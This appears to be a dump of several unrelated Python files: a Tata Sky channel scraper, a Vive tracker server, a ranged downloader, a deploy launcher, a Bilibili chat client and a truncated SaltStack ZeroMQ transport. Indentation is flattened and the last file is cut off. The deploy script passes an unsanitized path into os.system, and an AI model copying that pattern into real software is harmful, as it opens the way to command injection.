def test_exception_wrapper(self):
exc = None
try:
User.create(username=None)
except IntegrityError as e:
exc = e
if exc is None: raise Exception('expected integrity error not raised')
self.assertTrue(exc.orig.__module__ != 'peewee')
|
allChannels.py
|
### Script to get all channels from tata sky
import threading
import requests
import json as json
API_BASE_URL = "https://kong-tatasky.videoready.tv/"
channel_list = []
def getChannelInfo(channelId):
url = "{}content-detail/pub/api/v1/channels/{}".format(API_BASE_URL, channelId)
x = requests.get(url)
channel_meta = x.json()['data']['meta'][0]
channel_detail_dict = x.json()['data']['detail']
onechannl = {
"channel_id": str(channelId),
"channel_name": channel_meta.get('channelName', ''),
"channel_license_url": channel_detail_dict.get('dashWidewineLicenseUrl', ''),
"channel_url": channel_detail_dict.get('dashWidewinePlayUrl', ''),
"channel_entitlements": channel_detail_dict.get('entitlements', ''),
"channel_logo": channel_meta.get('channelLogo', ''),
"channel_genre": channel_meta.get('primaryGenre',"")
}
channel_list.append(onechannl)
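# For reference, each entry appended to channel_list above (and later dumped to
# allChannels.json) is a dict shaped like this sketch; the values are illustrative only:
# {
#     "channel_id": "123",
#     "channel_name": "Example Channel HD",
#     "channel_license_url": "https://example.com/license",
#     "channel_url": "https://example.com/manifest.mpd",
#     "channel_entitlements": [],
#     "channel_logo": "https://example.com/logo.png",
#     "channel_genre": "Entertainment"
# }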
def saveChannelsToFile():
print(len(channel_list))
with open("allChannels.json", "w") as channel_list_file:
json.dump(channel_list, channel_list_file)
channel_list_file.close()
def processChunks(channel_lists):
for channel in channel_lists:
print("Getting channelId:{}".format(channel.get('id', '')))
channel_id = str(channel.get('id', ''))
getChannelInfo(channel_id)
def getAllChannels():
ts = []
url = API_BASE_URL + "content-detail/pub/api/v1/channels?limit=534"
x = requests.get(url)
    # Avoid shadowing the global channel_list that getChannelInfo appends to.
    channels = x.json()['data']['list']
    print("Total Channels fetched:", len(channels))
    print("Fetching channel info..........")
    for i in range(0, len(channels), 5):
        t = threading.Thread(target=processChunks, args=(channels[i:i + 5],))
        ts.append(t)
        t.start()
    for t in ts:
        t.join()
    print("Saving all to a file.... " + str(len(channels)))
saveChannelsToFile()
if __name__ == '__main__':
getAllChannels()
|
vive_tracker_server.py
|
"""
OpenVr based Vive tracker server
"""
import argparse
import json
import logging
import logging.handlers
import socket
from multiprocessing import Queue, Process, Pipe
from pathlib import Path
from typing import List
from typing import Optional
import yaml
import numpy as np
import scipy.spatial.transform as transform
import time
import os
from base_server import Server
from gui import GuiManager
from models import ViveDynamicObjectMessage, ViveStaticObjectMessage, Configuration
from triad_openvr import TriadOpenVR
def construct_socket_msg(data: ViveDynamicObjectMessage) -> str:
"""
    Construct the framed string to send over the socket for a vive tracker message
Args:
data: ViveTracker Message to send
Returns:
message in string to send
"""
json_data = json.dumps(data.json(), sort_keys=False)
json_data = "&" + json_data
json_data = json_data + "\r" # * (512 - len(json_data))
return json_data
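# Framing sketch (values made up), assuming ViveDynamicObjectMessage is a pydantic-style
# model whose .json() returns a JSON string: json.dumps() of that string re-quotes it, so
# the data on the wire looks like
#   &"{\"valid\": true, \"x\": 0.1, ...}"\r
# i.e. a '&' start marker, the payload, and a trailing carriage return as the terminator.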
class ViveTrackerServer(Server):
"""
Defines a UDP vive tracker server that constantly "shout out" messages at (HOST, PORT)
Utilizes OpenVR as its interaction with SteamVR. For hardware setup, please see this tutorial:
http://help.triadsemi.com/en/articles/836917-steamvr-tracking-without-an-hmd
"""
def __init__(self, port: int, pipe: Pipe, logging_queue: Queue,
config_path: Path = Path(f"~/vive_ros2/config.yml").expanduser(),
use_gui: bool = False, buffer_length: int = 1024, should_record: bool = False,
output_file_path: Path = Path(f"~/vive_ros2/data/RFS_track.txt").expanduser()):
"""
Initialize socket and OpenVR
Args:
port: desired port to open
logging_queue: handler with where to send logs
            buffer_length: maximum size, in bytes, of a single request (the tracker name) read from the socket
should_record: should record data or not
output_file_path: output file's path
"""
super(ViveTrackerServer, self).__init__(port)
self.logger = logging.getLogger("ViveTrackerServer")
self.logger.addHandler(logging.handlers.QueueHandler(logging_queue))
self.logger.setLevel(logging.INFO)
self.pipe = pipe
self.use_gui = use_gui
self.config_path = config_path
self.config = Configuration()
# load the configuration if one exists otherwise create one and set defaults
if not self.config_path.exists():
            os.makedirs(os.path.dirname(self.config_path), exist_ok=True)
with open(self.config_path, 'w') as f:
yaml.dump(self.config.dict(), f)
else:
with open(self.config_path, 'r') as f:
data = yaml.load(f, Loader=yaml.FullLoader)
self.config = self.config.parse_obj(data)
self.socket = self.initialize_socket()
self.triad_openvr: Optional[TriadOpenVR] = None
self.reconnect_triad_vr()
self.should_record = should_record
self.output_file_path = output_file_path
self.output_file = None
if not self.output_file_path.exists():
self.output_file_path.parent.mkdir(parents=True, exist_ok=True)
self.output_file = self.output_file_path.open('w')
self.buffer_length = buffer_length
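        # Sketch of the on-disk config.yml this reads/writes (keys inferred from the
        # Configuration fields used in this file; the exact schema lives in models.py):
        #   name_mappings:
        #     LHR-XXXXXXXX: tracker_1        # device serial -> friendly name
        #   Twv_x: 0.0                       # world-frame calibration translation ...
        #   Twv_qw: 1.0                      # ... and rotation quaternion (identity by default)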
def run(self):
"""
Initialize a server that runs forever.
This server can be put into a multi-process module to run concurrently with other servers.
        This server listens for a client's request naming a specific tracker,
        computes that tracker's current state, and sends the information back
        to the requesting client.
Returns:
None
"""
self.logger.info(f"Starting server at {self.ip}:{self.port}")
self.logger.info("Connected VR devices: \n###########\n" + str(self.triad_openvr) + "###########")
# Main server loop
while True:
messages = {"state": {}}
# Transmit data over the network
try:
tracker_name, addr = self.socket.recvfrom(self.buffer_length)
tracker_name = tracker_name.decode()
tracker_key = self.resolve_name_to_key(tracker_name)
if tracker_key in self.get_tracker_keys():
message = self.poll_tracker(tracker_key=tracker_key)
messages["state"][tracker_key] = message
if message is not None:
socket_message = construct_socket_msg(data=message)
self.socket.sendto(socket_message.encode(), addr)
if self.should_record:
self.record(data=message)
else:
self.logger.error(f"Tracker {tracker_name} with key {tracker_key} not found")
except socket.timeout:
self.logger.info("Did not receive connection from client")
except Exception as e:
self.logger.error(e)
# See if any commands have been sent from the gui
while self.pipe.poll():
data = self.pipe.recv()
if "config" in data:
self.config = data["config"]
self.logger.info(f"Configuration updated")
if "save" in data:
self.save_config(data["save"])
if "refresh" in data:
self.logger.info("Refreshing system")
self.reconnect_triad_vr()
if "calibrate" in data:
self.calibrate_world_frame(*data["calibrate"])
# Update the GUI
if self.use_gui:
                # Make sure all trackers are shown in the GUI regardless of whether they are being subscribed to
for tracker_key in self.get_tracker_keys():
if tracker_key not in messages["state"]:
message = self.poll_tracker(tracker_key=tracker_key)
if message is not None:
messages["state"][tracker_key] = message
for reference_key in self.get_tracking_reference_keys():
if reference_key not in messages["state"]:
message = self.poll_tracking_reference(tracking_reference_key=reference_key)
if message is not None:
messages["state"][reference_key] = message
# Always send the current configuration to ensure synchronization with GUI
messages["config"] = self.config
self.pipe.send(messages)
def resolve_name_to_key(self, name):
"""
Takes in a name that is either assigned to a device serial number
or a key. Note that the name should not resemble the keys automatically assigned
to devices.
"""
keys = list(self.config.name_mappings.keys())
values = list(self.config.name_mappings.values())
for i in range(len(values)):
if values[i] == name:
serial = keys[i]
for device_key in self.get_device_keys():
if self.get_device(device_key).get_serial() == serial:
return device_key
return keys[i]
return name
def clear_calibration(self):
self.config.Twv_x = float(0)
self.config.Twv_y = float(0)
self.config.Twv_z = float(0)
self.config.Twv_qx = float(0)
self.config.Twv_qy = float(0)
self.config.Twv_qz = float(0)
self.config.Twv_qw = float(1)
def set_config_calibration_from_matrix(self, T):
q = transform.Rotation.from_matrix(T[:3, :3]).as_quat() # x y z w
t = T[:3, 3]
self.config.Twv_x = float(t[0])
self.config.Twv_y = float(t[1])
self.config.Twv_z = float(t[2])
self.config.Twv_qx = float(q[0])
self.config.Twv_qy = float(q[1])
self.config.Twv_qz = float(q[2])
self.config.Twv_qw = float(q[3])
def calibrate_world_frame(self, origin: str, pos_x: str, pos_y: str, duration: float = 2.0):
self.clear_calibration()
origin_key = self.resolve_name_to_key(origin)
pos_x_key = self.resolve_name_to_key(pos_x)
pos_y_key = self.resolve_name_to_key(pos_y)
origin_history = []
pos_x_history = []
pos_y_history = []
start = time.time()
while time.time() - start < duration:
origin_message = self.poll_tracker(origin_key)
pos_x_message = self.poll_tracker(pos_x_key)
pos_y_message = self.poll_tracker(pos_y_key)
origin_history.append(np.array([origin_message.x, origin_message.y, origin_message.z]))
pos_x_history.append(np.array([pos_x_message.x, pos_x_message.y, pos_x_message.z]))
pos_y_history.append(np.array([pos_y_message.x, pos_y_message.y, pos_y_message.z]))
avg_origin = np.average(np.array(origin_history), axis=0)
avg_pos_x = np.average(np.array(pos_x_history), axis=0)
avg_pos_y = np.average(np.array(pos_y_history), axis=0)
vx = avg_pos_x - avg_origin
vy = avg_pos_y - avg_origin
vx /= np.linalg.norm(vx)
vy /= np.linalg.norm(vy)
vz = np.cross(vx, vy)
m_rot = np.array([[*vx, 0],
[*vy, 0],
[*vz, 0],
[0, 0, 0, 1]])
m_pos = np.array([[1, 0, 0, -avg_origin[0]],
[0, 1, 0, -avg_origin[1]],
[0, 0, 1, -avg_origin[2]],
[0, 0, 0, 1]])
self.set_config_calibration_from_matrix(m_rot @ m_pos)
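        # Net effect (sketch): with R's rows being the measured world axes vx, vy, vz
        # expressed in vive coordinates and o the averaged origin, the stored transform
        # is p_world = R @ (p_vive - o), which is exactly what get_rot_vw() and
        # translate_to_origin() apply to every pose polled later.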
def save_config(self, path: Path = None):
        path = path or self.config_path  # default to self.config_path if path is None
self.logger.info(f"Saving configuration to {path}")
with open(path, 'w') as f:
yaml.dump(self.config.dict(), f)
self.logger.info(f"Configuration saved successfully!")
def poll_tracker(self, tracker_key) -> Optional[ViveDynamicObjectMessage]:
"""
Polls tracker message by name
Note:
Server will attempt to reconnect if tracker name is not found.
Args:
tracker_key: the vive tracker message intended to poll
Returns:
ViveTrackerMessage if tracker is found, None otherwise.
"""
tracker = self.get_device(key=tracker_key)
if tracker is not None:
message: Optional[ViveDynamicObjectMessage] = self.create_dynamic_message(device=tracker,
device_key=tracker_key)
return message
else:
self.reconnect_triad_vr()
return None
def poll_controller(self, controller_key) -> Optional[ViveDynamicObjectMessage]:
"""
Polls controller message by name
Note:
Server will attempt to reconnect if tracker name is not found.
Args:
controller_key: the vive tracker message intended to poll
Returns:
ViveTrackerMessage if tracker is found, None otherwise.
"""
controller = self.get_device(key=controller_key)
if controller is not None:
message: Optional[ViveDynamicObjectMessage] = self.create_dynamic_message(device=controller,
device_key=controller_key)
return message
else:
self.reconnect_triad_vr()
return None
def poll_tracking_reference(self, tracking_reference_key) -> Optional[ViveStaticObjectMessage]:
"""
Polls tracking reference message by name
Note:
Server will attempt to reconnect if tracker name is not found.
Args:
tracking_reference_key: the vive tracking reference intended to poll
Returns:
ViveTrackerMessage if tracker is found, None otherwise.
"""
tracking_reference = self.get_device(key=tracking_reference_key)
if tracking_reference is not None:
message: Optional[ViveStaticObjectMessage] = self.create_static_message(device=tracking_reference,
device_key=tracking_reference_key)
return message
else:
self.reconnect_triad_vr()
return None
def get_device(self, key):
"""
Given tracker name, find the tracker instance
Args:
key: desired tracker's name to find
Returns:
tracker instance if found, None otherwise
"""
return self.triad_openvr.devices.get(key, None)
def get_rot_vw(self) -> transform.Rotation:
"""Get the rotation from the vive frame to the world frame"""
return transform.Rotation.from_quat([self.config.Twv_qx,
self.config.Twv_qy,
self.config.Twv_qz,
self.config.Twv_qw])
def get_rot_wv(self) -> transform.Rotation:
"""Get the rotation from the world frame to the vive frame"""
return transform.Rotation.from_quat([self.config.Twv_qx,
self.config.Twv_qy,
self.config.Twv_qz,
self.config.Twv_qw]).inverse()
def translate_to_origin(self, x, y, z):
return x + self.config.Twv_x, y + self.config.Twv_y, z + self.config.Twv_z
def create_dynamic_message(self, device, device_key) -> Optional[ViveDynamicObjectMessage]:
"""
Create dynamic object message given device and device name
Note:
it will attempt to reconnect to OpenVR if conversion or polling from device went wrong.
Args:
device: tracker instance
device_key: the device's name corresponding to this tracker
Returns:
Vive dynamic message if this is a successful conversion, None otherwise
"""
try:
            _, _, _, r, p, y = device.get_pose_euler()  # euler values are unused; r, p, y are overwritten below
x, y, z, qw, qx, qy, qz = device.get_pose_quaternion()
vel_x, vel_y, vel_z = device.get_velocity()
p, q, r = device.get_angular_velocity()
# handle world transform
rot_vw = self.get_rot_vw()
x, y, z = rot_vw.apply([x, y, z])
x, y, z = self.translate_to_origin(x, y, z)
# bring velocities into the local device frame such that positive x is pointing out the USB port
rot_lv = transform.Rotation.from_quat([qx, qy, qz, qw]) * transform.Rotation.from_matrix([[0, 1, 0],
[1, 0, 0],
[0, 0, -1]])
vel_x, vel_y, vel_z = rot_lv.apply([vel_x, vel_y, vel_z], inverse=True)
p, q, r = rot_lv.apply([p, q, r], inverse=True)
qx, qy, qz, qw = rot_lv.inv().as_quat()
serial = device.get_serial()
device_name = device_key if serial not in self.config.name_mappings else self.config.name_mappings[serial]
message = ViveDynamicObjectMessage(valid=True, x=x, y=y, z=z,
qx=qx, qy=qy, qz=qz, qw=qw,
vel_x=vel_x, vel_y=vel_y, vel_z=vel_z,
p=p, q=q, r=r,
device_name=device_name,
serial_num=serial)
return message
except OSError as e:
self.logger.error(f"OSError: {e}. Need to restart Vive Tracker Server")
self.reconnect_triad_vr()
except Exception as e:
self.logger.error(f"Exception {e} has occurred, this may be because device {device} "
f"is either offline or malfunctioned")
self.reconnect_triad_vr()
return None
def create_static_message(self, device, device_key) -> Optional[ViveStaticObjectMessage]:
"""
Create tracker message given device and device name
Note:
it will attempt to reconnect to OpenVR if conversion or polling from tracker went wrong.
Args:
device: device instance
device_key: the device's name corresponding to this tracker
Returns:
Vive static message if this is a successful conversion, None otherwise
"""
try:
x, y, z, qw, qx, qy, qz = device.get_pose_quaternion()
x, y, z = self.get_rot_vw().apply([x, y, z])
x, y, z = self.translate_to_origin(x, y, z)
serial = device.get_serial()
device_name = device_key if serial not in self.config.name_mappings else self.config.name_mappings[serial]
message = ViveStaticObjectMessage(valid=True, x=x, y=y, z=z,
qx=qx, qy=qy, qz=qz, qw=qw,
device_name=device_name,
serial_num=serial)
return message
except OSError as e:
self.logger.error(f"OSError: {e}. Need to restart Vive Tracker Server")
self.reconnect_triad_vr()
except Exception as e:
self.logger.error(f"Exception {e} has occurred, this may be because device {device} "
f"is either offline or malfunctioned")
self.reconnect_triad_vr()
return None
def reconnect_triad_vr(self, debug=False):
"""
Attempt to reconnect to TriadOpenVR
Notes:
this method will automatically assign self.triad_openvr
Args:
            debug: deprecated flag, retained for compatibility
Returns:
openvr instance
"""
del self.triad_openvr
self.triad_openvr = TriadOpenVR()
if debug:
self.logger.debug(
f"Trying to reconnect to OpenVR to refresh devices. "
f"Devices online:")
self.logger.info(self.triad_openvr.devices)
def get_tracker_keys(self) -> List[str]:
"""
Get a list of trackers
Returns:
list of tracker names
"""
return self.get_device_keys(filters=["tracker"])
def get_tracking_reference_keys(self) -> List[str]:
"""
Get a list of tracking references (base stations)
Returns:
list of references names
"""
return self.get_device_keys(filters=["reference"])
def get_controller_keys(self) -> List[str]:
"""
Get a list of controllers
Returns:
list of controller names
"""
return self.get_device_keys(filters=["controller"])
def get_device_keys(self, filters=None) -> List[str]:
result = []
for device_name in self.triad_openvr.devices.keys():
if filters is None:
result.append(device_name)
else:
for s in filters:
if s in device_name:
result.append(device_name)
return result
def record(self, data: ViveDynamicObjectMessage):
"""
Record the current data
Args:
data: current ViveTrackerMessage to record
Returns:
None
"""
x, y, z, qw, qx, qy, qz = data.x, data.y, data.z, data.qw, data.qx, data.qy, data.qz
recording_data = f"{x}, {y},{z},{qw},{qx},{qy},{qz}"
m = f"Recording: {recording_data}"
self.logger.info(m)
self.output_file.write(recording_data + "\n")
def run_server(port: int, pipe: Pipe, logging_queue: Queue, config: Path, use_gui: bool, should_record: bool = False):
vive_tracker_server = ViveTrackerServer(port=port, pipe=pipe, logging_queue=logging_queue, use_gui=use_gui,
config_path=config, should_record=should_record)
vive_tracker_server.run()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Vive tracker server')
    parser.add_argument('--headless', action='store_true', help='run without the gui')
    parser.add_argument('--port', type=int, default=8000, help='port to broadcast tracker data on')
parser.add_argument('--config', default=f"~/vive_ros2/config.yml",
help='tracker configuration file')
args = parser.parse_args()
logger_queue = Queue()
gui_conn, server_conn = Pipe()
config = Path(args.config).expanduser()
string_formatter = logging.Formatter(fmt='%(asctime)s|%(name)s|%(levelname)s|%(message)s', datefmt="%H:%M:%S")
if args.headless:
p = Process(target=run_server, args=(args.port, server_conn, logger_queue, config, False,))
p.start()
try:
# This should be updated to be a bit cleaner
while True:
print(string_formatter.format(logger_queue.get()))
finally:
p.kill()
else:
p = Process(target=run_server, args=(args.port, server_conn, logger_queue, config, True,))
p.start()
try:
gui = GuiManager(gui_conn, logger_queue)
gui.start()
finally:
p.kill()
|
downl.py
|
import threading
from multiprocessing import cpu_count
import cusconf
import requests
config = cusconf.getconfig()
baseheader = {
'User-Agent': config['ua'],
'accept-encoding': 'gzip',
'cookie': config['cookie']
}
def Handler(start, end, url, filename):
    # Download bytes [start, end] via an HTTP Range request and write them in place.
    range_header = {'Range': 'bytes=%d-%d' % (start, end)}
    headers = {**baseheader, **range_header}
    r = requests.get(url, headers=headers, stream=True)
    with open(filename, "r+b") as fp:
        fp.seek(start)
        fp.write(r.content)
def download(url, path):
num_thread = cpu_count()
r = requests.head(url)
    print(r.headers.get('Transfer-Encoding'))
    try:
        file_size = int(r.headers['content-length'])
    except (KeyError, ValueError):
        print("Not supported: server did not return a content-length.")
        return
# create file
fp = open(path, "wb")
fp.truncate(file_size)
fp.close()
    # Start one thread per chunk; each writes its own slice of the file
part = file_size // num_thread
for i in range(num_thread):
start = part * i
if i == num_thread - 1:
end = file_size
else:
end = start + part
t = threading.Thread(target=Handler, kwargs={'start': start, 'end': end, 'url': url, 'filename': path})
        t.daemon = True
t.start()
    # wait for all download threads to finish
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is main_thread:
continue
t.join()
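# Minimal usage sketch (hypothetical URL and output path; assumes cusconf.getconfig()
# returns a dict with 'ua' and 'cookie' entries and the server supports Range requests):
# if __name__ == '__main__':
#     download('https://example.com/big_file.bin', 'big_file.bin')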
|
mesh_release.py
|
# -*- coding: utf-8 -*-
from base.log import *
import os
import time
from multiprocessing import Process
import redis_pool
def gen_id():
r = redis_pool.get('dornaemon')
return r.incr('deploy_id')
def do(release_path, deploy_id):
log_path = 'html/deploy_logs/%d.txt' % deploy_id
cmd = "python /home/op/mesh_deploy_5.80/no_cat_release.py %s > %s 2>&1" % (release_path, log_path)
logger().info('cmd:%s', cmd)
if 0 != os.system(cmd):
msg = '[Finish] Failed to deploy [%s]' % deploy_id
else:
msg = '[Finish] Success to deploy [%s]' % deploy_id
logger().error(msg)
open(log_path, 'a').write(msg)
def start(release_path):
deploy_id = gen_id()
p = Process(target=do, args=(release_path, deploy_id))
p.start()
logger().info('start deploy [%s]', deploy_id)
return deploy_id
def status(deploy_id):
log_path = 'html/deploy_logs/%s.txt' % deploy_id
content = open(log_path).read()
return content
def main():
deploy_id = start('/mnt/data1/release')
while True:
time.sleep(1)
#print status(deploy_id)
if __name__ == '__main__':
main()
|
chat.py
|
import websocket
import json
import logging
import asyncio
from threading import Thread
from threading import Event
from realtime_chat.bilibili import blivedm
from realtime_chat.bilibili import common
from realtime_chat.chats import Chat
from realtime_chat.chats import Chats
class ChatDownloader(object):
"""docstring for ChatDownloader"""
def __init__(self):
super(ChatDownloader, self).__init__()
self.__chats = Chats()
@property
def chats(self):
return self.__chats.chats
def get_room_id(self, url):
short_id = [p for p in url.split('/') if p != ''][-1]
data = common.getRoomInfo(short_id)
self.short_id = short_id
return data['data']['room_id']
def isLive(self):
data = common.getRoomInfo(self.short_id)
return data['data']['live_status'] == 1
def run(self, url):
roomid = self.get_room_id(url)
self._loop = asyncio.get_event_loop()
session = blivedm.BLiveClient(roomid, loop=self._loop)
session._on_receive_danmaku = lambda command: self._on_receive_danmaku(session, command)
session._on_super_chat = lambda command: self._on_super_chat(session, command)
session._on_receive_popularity = lambda command: self._on_receive_popularity(session, command)
future = session.start()
t = Thread(target = self.run_future, args= (future,))
        t.daemon = True
t.start()
return self.__chats
def run_future(self, future):
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
async def _on_receive_danmaku(self, bLiveClient, danmaku: blivedm.DanmakuMessage):
chat = Chat(
uid = danmaku.uid,
username = danmaku.uname,
timestamp = danmaku.timestamp / 1000,
message = danmaku.msg
)
self.__chats.put(chat)
    async def _on_super_chat(self, bLiveClient, message: blivedm.SuperChatMessage):
        # Use the received message instance, not the SuperChatMessage class itself.
        chat = Chat(
            uid = message.uid,
            username = message.uname,
            timestamp = message.start_time / 1000,
            message = message.message
        )
self.__chats.put(chat)
async def _on_receive_popularity(self, bLiveClient, popularity: int):
if popularity == 1 and not self.isLive():
self.__chats.close()
bLiveClient.close()
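# Minimal usage sketch (hypothetical room URL; the realtime_chat.bilibili helpers must be
# importable and the room live):
# downloader = ChatDownloader()
# chats = downloader.run('https://live.bilibili.com/12345')   # returns the Chats container
# # chats is filled asynchronously by the daemon thread started inside run()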
|
zeromq.py
|
# -*- coding: utf-8 -*-
"""
Zeromq transport classes
"""
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import copy
import errno
import hashlib
import logging
import os
import signal
import socket
import sys
import threading
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
# Import Tornado Libs
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.log.setup
import salt.payload
import salt.transport.client
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.versions
import salt.utils.zeromq
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
from salt._compat import ipaddress
from salt.exceptions import SaltException, SaltReqTimeoutError
from salt.ext import six
from salt.utils.zeromq import (
LIBZMQ_VERSION_INFO,
ZMQ_VERSION_INFO,
ZMQDefaultLoop,
install_zmq,
zmq,
)
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None):
"""
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
"""
from salt.utils.zeromq import ip_bracket
master_uri = "tcp://{master_ip}:{master_port}".format(
master_ip=ip_bracket(master_ip), master_port=master_port
)
if source_ip or source_port:
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip and source_port:
master_uri = "tcp://{source_ip}:{source_port};{master_ip}:{master_port}".format(
source_ip=ip_bracket(source_ip),
source_port=source_port,
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
elif source_ip and not source_port:
master_uri = "tcp://{source_ip}:0;{master_ip}:{master_port}".format(
source_ip=ip_bracket(source_ip),
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
elif source_port and not source_ip:
ip_any = (
"0.0.0.0"
if ipaddress.ip_address(master_ip).version == 4
else ip_bracket("::")
)
master_uri = "tcp://{ip_any}:{source_port};{master_ip}:{master_port}".format(
ip_any=ip_any,
source_port=source_port,
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
else:
log.warning(
"Unable to connect to the Master using a specific source IP / port"
)
log.warning("Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6")
            log.warning(
                "Specific source IP / port for connecting to master returner port: configuration ignored"
            )
return master_uri
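# Illustrative results of _get_master_uri (addresses are examples only):
#   _get_master_uri('192.168.1.17', 4506)                      -> 'tcp://192.168.1.17:4506'
#   _get_master_uri('192.168.1.17', 4506, '192.168.1.1', 5555) -> 'tcp://192.168.1.1:5555;192.168.1.17:4506'
# The second form needs libzmq >= 4.1.6 and pyzmq >= 16.0.1; otherwise only the plain
# master URI is returned and a warning is logged.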
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
"""
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
"""
Only create one instance of channel per __key()
"""
# do we have any mapping for this io_loop
io_loop = kwargs.get("io_loop")
if io_loop is None:
install_zmq()
io_loop = ZMQDefaultLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug("Initializing new AsyncZeroMQReqChannel for %s", key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
log.trace(
"Inserted key into loop_instance_map id %s for key %s and process %s",
id(loop_instance_map),
key,
os.getpid(),
)
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug("Re-using AsyncZeroMQReqChannel for %s", key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
# pylint: disable=too-many-function-args
result = cls.__new__(cls, copy.deepcopy(self.opts, memo))
# pylint: enable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ("_io_loop", "_refcount", "_refcount_lock"):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == "message_client":
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(
result,
key,
AsyncReqMessageClientPool(
result.opts,
args=(result.opts, self.master_uri,),
kwargs={"io_loop": self._io_loop},
),
)
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (
opts["pki_dir"], # where the keys are stored
opts["id"], # minion ID
kwargs.get("master_uri", opts.get("master_uri")), # master ID
kwargs.get("crypt", "aes"), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = "zeromq"
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
if "master_uri" in kwargs:
self.opts["master_uri"] = kwargs["master_uri"]
self._io_loop = kwargs.get("io_loop")
if self._io_loop is None:
install_zmq()
self._io_loop = ZMQDefaultLoop.current()
if self.crypt != "clear":
            # we don't need to worry about auth as a kwarg, since it's a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug(
"Connecting the Minion to the Master URI (for the return server): %s",
self.master_uri,
)
self.message_client = AsyncReqMessageClientPool(
self.opts,
args=(self.opts, self.master_uri,),
kwargs={"io_loop": self._io_loop},
)
self._closing = False
def close(self):
"""
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
"""
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
"This is not the last %s instance. Not closing yet.",
self.__class__.__name__,
)
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
if hasattr(self, "message_client"):
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self._io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self._io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self._io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
@property
def master_uri(self):
if "master_uri" in self.opts:
return self.opts["master_uri"]
# if by chance master_uri is not there..
if "master_ip" in self.opts:
return _get_master_uri(
self.opts["master_ip"],
self.opts["master_port"],
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_ret_port"),
)
# if we've reached here something is very abnormal
raise SaltException("ReqChannel: missing master_uri/master_ip in self.opts")
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if "key" not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
